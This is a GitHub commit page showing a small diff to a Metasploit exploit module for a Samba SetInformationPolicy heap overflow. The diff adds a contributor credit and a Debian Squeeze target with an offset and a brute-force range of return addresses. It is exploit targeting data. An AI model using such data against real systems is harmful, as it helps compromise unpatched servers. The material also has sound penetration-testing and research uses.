Skip to content

Commit 4c64676

Browse files
author
jvazquez-r7
committed
Added target debian squeeze
1 parent 8b8bfec commit 4c64676

File tree

1 file changed

+13
-0
lines changed

1 file changed

+13
-0
lines changed

modules/exploits/linux/samba/setinfopolicy_heap.rb

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34,6 +34,7 @@ def initialize(info = {})
3434
[
3535
'Unknown', # Vulnerability discovery
3636
'blasty', # Exploit
37+
'mephos', # Debian Squeeze target
3738
'sinn3r', # Metasploit module
3839
'juan vazquez' # Metasploit module
3940
],
@@ -96,6 +97,18 @@ def initialize(info = {})
9697
'Step' => 0x1000
9798
}
9899
}
100+
],
101+
['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',
102+
{
103+
'Offset' => 0x11c0,
104+
'Bruteforce' =>
105+
{
106+
# The start should be 0x680 aligned, and then step 0x1000.
107+
'Start' => { 'Ret' => 0xb6aaa1b0 },
108+
'Stop' => { 'Ret' => 0xb6ce91b0 },
109+
'Step' => 0x1000
110+
}
111+
}
99112
]
100113
],
101114
'DisclosureDate' => 'Apr 10 2012',

0 commit comments

Comments
 (0)